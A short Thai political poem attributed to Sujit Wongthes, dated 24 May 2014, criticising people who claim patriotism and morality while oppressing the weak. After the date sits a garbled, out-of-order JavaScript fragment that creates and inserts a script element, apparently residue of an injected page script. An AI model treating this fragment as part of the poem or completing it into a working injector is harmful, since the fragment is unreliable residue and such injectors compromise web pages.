รักชาติบนหัวคนอื่น

มั่นยืนบนหลังคนอ่อนแอกว่า

อวดอ้างศีลธรรมจรรยา

แต่หาความเป็นธรรมแล้วไม่มี

 

สุจิตต์ วงษ์เทศ

เสาร์ 24 พฤษภาคม 2557document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);